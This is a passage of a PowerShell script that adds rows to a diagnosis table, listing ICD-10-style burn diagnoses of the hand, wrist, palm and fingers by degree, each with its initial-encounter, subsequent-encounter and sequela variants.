unspecified multiple fingers (nail), not including thumb","Burn of unspecified degree of unspecified multiple fingers (nail), not including thumb, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple right fingers (nail), including thumb","Burn of unspecified degree of multiple right fingers (nail), including thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple right fingers (nail), including thumb","Burn of unspecified degree of multiple right fingers (nail), including thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple right fingers (nail), including thumb","Burn of unspecified degree of multiple right fingers (nail), including thumb, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple left fingers (nail), including thumb","Burn of unspecified degree of multiple left fingers (nail), including thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple left fingers (nail), including thumb","Burn of unspecified degree of multiple left fingers (nail), including thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple left fingers (nail), including thumb","Burn of unspecified degree of multiple left fingers (nail), including thumb, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified multiple fingers (nail), including thumb","Burn of unspecified degree of unspecified multiple fingers (nail), including thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified multiple fingers (nail), including thumb","Burn of unspecified degree of unspecified multiple fingers (nail), including thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified multiple fingers (nail), including thumb","Burn of unspecified degree of unspecified multiple fingers (nail), including thumb, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right palm","Burn of unspecified degree of right palm, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right palm","Burn of unspecified degree of right palm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right palm","Burn of unspecified degree of right palm, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left palm","Burn of unspecified degree of left palm, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left palm","Burn of unspecified degree of left palm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left palm","Burn of unspecified degree of left palm, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified palm","Burn of unspecified degree of unspecified palm, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified palm","Burn of unspecified degree of unspecified palm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified palm","Burn of unspecified degree of unspecified palm, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of back of right hand","Burn of unspecified degree of back of right hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of back of right hand","Burn of unspecified degree of back of right hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of back of right hand","Burn of unspecified degree of back of right hand, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of back of left hand","Burn of unspecified degree of back of left hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of back of left hand","Burn of unspecified degree of back of left hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of back of left hand","Burn of unspecified degree of back of left hand, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of back of unspecified hand","Burn of unspecified degree of back of unspecified hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of back of unspecified hand","Burn of unspecified degree of back of unspecified hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of back of unspecified hand","Burn of unspecified degree of back of unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right wrist","Burn of unspecified degree of right wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right wrist","Burn of unspecified degree of right wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of right wrist","Burn of unspecified degree of right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left wrist","Burn of unspecified degree of left wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left wrist","Burn of unspecified degree of left wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of left wrist","Burn of unspecified degree of left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified wrist","Burn of unspecified degree of unspecified wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified wrist","Burn of unspecified degree of unspecified wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of unspecified wrist","Burn of unspecified degree of unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple sites of right wrist and hand","Burn of unspecified degree of multiple sites of right wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple sites of right wrist and hand","Burn of unspecified degree of multiple sites of right wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple sites of right wrist and hand","Burn of unspecified degree of multiple sites of right wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple sites of left wrist and hand","Burn of unspecified degree of multiple sites of left wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple sites of left wrist and hand","Burn of unspecified degree of multiple sites of left wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple sites of left wrist and hand","Burn of unspecified degree of multiple sites of left wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple sites of unspecified wrist and hand","Burn of unspecified degree of multiple sites of unspecified wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple sites of unspecified wrist and hand","Burn of unspecified degree of multiple sites of unspecified wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of unspecified degree of multiple sites of unspecified wrist and hand","Burn of unspecified degree of multiple sites of unspecified wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right hand, unspecified site","Burn of first degree of right hand, unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right hand, unspecified site","Burn of first degree of right hand, unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right hand, unspecified site","Burn of first degree of right hand, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left hand, unspecified site","Burn of first degree of left hand, unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left hand, unspecified site","Burn of first degree of left hand, unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left hand, unspecified site","Burn of first degree of left hand, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified hand, unspecified site","Burn of first degree of unspecified hand, unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified hand, unspecified site","Burn of first degree of unspecified hand, unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified hand, unspecified site","Burn of first degree of unspecified hand, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right thumb (nail)","Burn of first degree of right thumb (nail), initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right thumb (nail)","Burn of first degree of right thumb (nail), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right thumb (nail)","Burn of first degree of right thumb (nail), sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left thumb (nail)","Burn of first degree of left thumb (nail), initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left thumb (nail)","Burn of first degree of left thumb (nail), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left thumb (nail)","Burn of first degree of left thumb (nail), sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified thumb (nail)","Burn of first degree of unspecified thumb (nail), initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified thumb (nail)","Burn of first degree of unspecified thumb (nail), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified thumb (nail)","Burn of first degree of unspecified thumb (nail), sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of single right finger (nail) except thumb","Burn of first degree of single right finger (nail) except thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of single right finger (nail) except thumb","Burn of first degree of single right finger (nail) except thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of single right finger (nail) except thumb","Burn of first degree of single right finger (nail) except thumb, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of single left finger (nail) except thumb","Burn of first degree of single left finger (nail) except thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of single left finger (nail) except thumb","Burn of first degree of single left finger (nail) except thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of single left finger (nail) except thumb","Burn of first degree of single left finger (nail) except thumb, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified single finger (nail) except thumb","Burn of first degree of unspecified single finger (nail) except thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified single finger (nail) except thumb","Burn of first degree of unspecified single finger (nail) except thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified single finger (nail) except thumb","Burn of first degree of unspecified single finger (nail) except thumb, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple right fingers (nail), not including thumb","Burn of first degree of multiple right fingers (nail), not including thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple right fingers (nail), not including thumb","Burn of first degree of multiple right fingers (nail), not including thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple right fingers (nail), not including thumb","Burn of first degree of multiple right fingers (nail), not including thumb, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple left fingers (nail), not including thumb","Burn of first degree of multiple left fingers (nail), not including thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple left fingers (nail), not including thumb","Burn of first degree of multiple left fingers (nail), not including thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple left fingers (nail), not including thumb","Burn of first degree of multiple left fingers (nail), not including thumb, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified multiple fingers (nail), not including thumb","Burn of first degree of unspecified multiple fingers (nail), not including thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified multiple fingers (nail), not including thumb","Burn of first degree of unspecified multiple fingers (nail), not including thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified multiple fingers (nail), not including thumb","Burn of first degree of unspecified multiple fingers (nail), not including thumb, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple right fingers (nail), including thumb","Burn of first degree of multiple right fingers (nail), including thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple right fingers (nail), including thumb","Burn of first degree of multiple right fingers (nail), including thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple right fingers (nail), including thumb","Burn of first degree of multiple right fingers (nail), including thumb, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple left fingers (nail), including thumb","Burn of first degree of multiple left fingers (nail), including thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple left fingers (nail), including thumb","Burn of first degree of multiple left fingers (nail), including thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple left fingers (nail), including thumb","Burn of first degree of multiple left fingers (nail), including thumb, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified multiple fingers (nail), including thumb","Burn of first degree of unspecified multiple fingers (nail), including thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified multiple fingers (nail), including thumb","Burn of first degree of unspecified multiple fingers (nail), including thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified multiple fingers (nail), including thumb","Burn of first degree of unspecified multiple fingers (nail), including thumb, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right palm","Burn of first degree of right palm, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right palm","Burn of first degree of right palm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right palm","Burn of first degree of right palm, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left palm","Burn of first degree of left palm, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left palm","Burn of first degree of left palm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left palm","Burn of first degree of left palm, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified palm","Burn of first degree of unspecified palm, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified palm","Burn of first degree of unspecified palm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified palm","Burn of first degree of unspecified palm, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of back of right hand","Burn of first degree of back of right hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of back of right hand","Burn of first degree of back of right hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of back of right hand","Burn of first degree of back of right hand, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of back of left hand","Burn of first degree of back of left hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of back of left hand","Burn of first degree of back of left hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of back of left hand","Burn of first degree of back of left hand, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of back of unspecified hand","Burn of first degree of back of unspecified hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of back of unspecified hand","Burn of first degree of back of unspecified hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of back of unspecified hand","Burn of first degree of back of unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right wrist","Burn of first degree of right wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right wrist","Burn of first degree of right wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right wrist","Burn of first degree of right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left wrist","Burn of first degree of left wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left wrist","Burn of first degree of left wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left wrist","Burn of first degree of left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified wrist","Burn of first degree of unspecified wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified wrist","Burn of first degree of unspecified wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified wrist","Burn of first degree of unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple sites of right wrist and hand","Burn of first degree of multiple sites of right wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple sites of right wrist and hand","Burn of first degree of multiple sites of right wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple sites of right wrist and hand","Burn of first degree of multiple sites of right wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple sites of left wrist and hand","Burn of first degree of multiple sites of left wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple sites of left wrist and hand","Burn of first degree of multiple sites of left wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple sites of left wrist and hand","Burn of first degree of multiple sites of left wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple sites of unspecified wrist and hand","Burn of first degree of multiple sites of unspecified wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple sites of unspecified wrist and hand","Burn of first degree of multiple sites of unspecified wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple sites of unspecified wrist and hand","Burn of first degree of multiple sites of unspecified wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right hand, unspecified site","Burn of second degree of right hand, unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right hand, unspecified site","Burn of second degree of right hand, unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right hand, unspecified site","Burn of second degree of right hand, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left hand, unspecified site","Burn of second degree of left hand, unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left hand, unspecified site","Burn of second degree of left hand, unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left hand, unspecified site","Burn of second degree of left hand, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified hand, unspecified site","Burn of second degree of unspecified hand, unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified hand, unspecified site","Burn of second degree of unspecified hand, unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified hand, unspecified site","Burn of second degree of unspecified hand, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right thumb (nail)","Burn of second degree of right thumb (nail), initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right thumb (nail)","Burn of second degree of right thumb (nail), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right thumb (nail)","Burn of second degree of right thumb (nail), sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left thumb (nail)","Burn of second degree of left thumb (nail), initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left thumb (nail)","Burn of second degree of left thumb (nail), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left thumb (nail)","Burn of second degree of left thumb (nail), sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified thumb (nail)","Burn of second degree of unspecified thumb (nail), initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified thumb (nail)","Burn of second degree of unspecified thumb (nail), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified thumb (nail)","Burn of second degree of unspecified thumb (nail), sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of single right finger (nail) except thumb","Burn of second degree of single right finger (nail) except thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of single right finger (nail) except thumb","Burn of second degree of single right finger (nail) except thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of single right finger (nail) except thumb","Burn of second degree of single right finger (nail) except thumb, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of single left finger (nail) except thumb","Burn of second degree of single left finger (nail) except thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of single left finger (nail) except thumb","Burn of second degree of single left finger (nail) except thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of single left finger (nail) except thumb","Burn of second degree of single left finger (nail) except thumb, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified single finger (nail) except thumb","Burn of second degree of unspecified single finger (nail) except thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified single finger (nail) except thumb","Burn of second degree of unspecified single finger (nail) except thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified single finger (nail) except thumb","Burn of second degree of unspecified single finger (nail) except thumb, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple right fingers (nail), not including thumb","Burn of second degree of multiple right fingers (nail), not including thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple right fingers (nail), not including thumb","Burn of second degree of multiple right fingers (nail), not including thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple right fingers (nail), not including thumb","Burn of second degree of multiple right fingers (nail), not including thumb, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple left fingers (nail), not including thumb","Burn of second degree of multiple left fingers (nail), not including thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple left fingers (nail), not including thumb","Burn of second degree of multiple left fingers (nail), not including thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple left fingers (nail), not including thumb","Burn of second degree of multiple left fingers (nail), not including thumb, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified multiple fingers (nail), not including thumb","Burn of second degree of unspecified multiple fingers (nail), not including thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified multiple fingers (nail), not including thumb","Burn of second degree of unspecified multiple fingers (nail), not including thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified multiple fingers (nail), not including thumb","Burn of second degree of unspecified multiple fingers (nail), not including thumb, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple right fingers (nail), including thumb","Burn of second degree of multiple right fingers (nail), including thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple right fingers (nail), including thumb","Burn of second degree of multiple right fingers (nail), including thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple right fingers (nail), including thumb","Burn of second degree of multiple right fingers (nail), including thumb, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple left fingers (nail), including thumb","Burn of second degree of multiple left fingers (nail), including thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple left fingers (nail), including thumb","Burn of second degree of multiple left fingers (nail), including thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple left fingers (nail), including thumb","Burn of second degree of multiple left fingers (nail), including thumb, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified multiple fingers (nail), including thumb","Burn of second degree of unspecified multiple fingers (nail), including thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified multiple fingers (nail), including thumb","Burn of second degree of unspecified multiple fingers (nail), including thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified multiple fingers (nail), including thumb","Burn of second degree of unspecified multiple fingers (nail), including thumb, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right palm","Burn of second degree of right palm, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right palm","Burn of second degree of right palm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right palm","Burn of second degree of right palm, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left palm","Burn of second degree of left palm, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left palm","Burn of second degree of left palm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left palm","Burn of second degree of left palm, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified palm","Burn of second degree of unspecified palm, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified palm","Burn of second degree of unspecified palm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified palm","Burn of second degree of unspecified palm, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of back of right hand","Burn of second degree of back of right hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of back of right hand","Burn of second degree of back of right hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of back of right hand","Burn of second degree of back of right hand, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of back of left hand","Burn of second degree of back of left hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of back of left hand","Burn of second degree of back of left hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of back of left hand","Burn of second degree of back of left hand, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of back of unspecified hand","Burn of second degree of back of unspecified hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of back of unspecified hand","Burn of second degree of back of unspecified hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of back of unspecified hand","Burn of second degree of back of unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right wrist","Burn of second degree of right wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right wrist","Burn of second degree of right wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right wrist","Burn of second degree of right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left wrist","Burn of second degree of left wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left wrist","Burn of second degree of left wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left wrist","Burn of second degree of left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified wrist","Burn of second degree of unspecified wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified wrist","Burn of second degree of unspecified wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified wrist","Burn of second degree of unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple sites of right wrist and hand","Burn of second degree of multiple sites of right wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple sites of right wrist and hand","Burn of second degree of multiple sites of right wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple sites of right wrist and hand","Burn of second degree of multiple sites of right wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple sites of left wrist and hand","Burn of second degree of multiple sites of left wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple sites of left wrist and hand","Burn of second degree of multiple sites of left wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple sites of left wrist and hand","Burn of second degree of multiple sites of left wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple sites of unspecified wrist and hand","Burn of second degree of multiple sites of unspecified wrist and hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple sites of unspecified wrist and hand","Burn of second degree of multiple sites of unspecified wrist and hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple sites of unspecified wrist and hand","Burn of second degree of multiple sites of unspecified wrist and hand, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right hand, unspecified site","Burn of third degree of right hand, unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right hand, unspecified site","Burn of third degree of right hand, unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right hand, unspecified site","Burn of third degree of right hand, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left hand, unspecified site","Burn of third degree of left hand, unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left hand, unspecified site","Burn of third degree of left hand, unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left hand, unspecified site","Burn of third degree of left hand, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified hand, unspecified site","Burn of third degree of unspecified hand, unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified hand, unspecified site","Burn of third degree of unspecified hand, unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified hand, unspecified site","Burn of third degree of unspecified hand, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right thumb (nail)","Burn of third degree of right thumb (nail), initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right thumb (nail)","Burn of third degree of right thumb (nail), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right thumb (nail)","Burn of third degree of right thumb (nail), sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left thumb (nail)","Burn of third degree of left thumb (nail), initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left thumb (nail)","Burn of third degree of left thumb (nail), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left thumb (nail)","Burn of third degree of left thumb (nail), sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified thumb (nail)","Burn of third degree of unspecified thumb (nail), initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified thumb (nail)","Burn of third degree of unspecified thumb (nail), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified thumb (nail)","Burn of third degree of unspecified thumb (nail), sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of single right finger (nail) except thumb","Burn of third degree of single right finger (nail) except thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of single right finger (nail) except thumb","Burn of third degree of single right finger (nail) except thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of single right finger (nail) except thumb","Burn of third degree of single right finger (nail) except thumb, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of single left finger (nail) except thumb","Burn of third degree of single left finger (nail) except 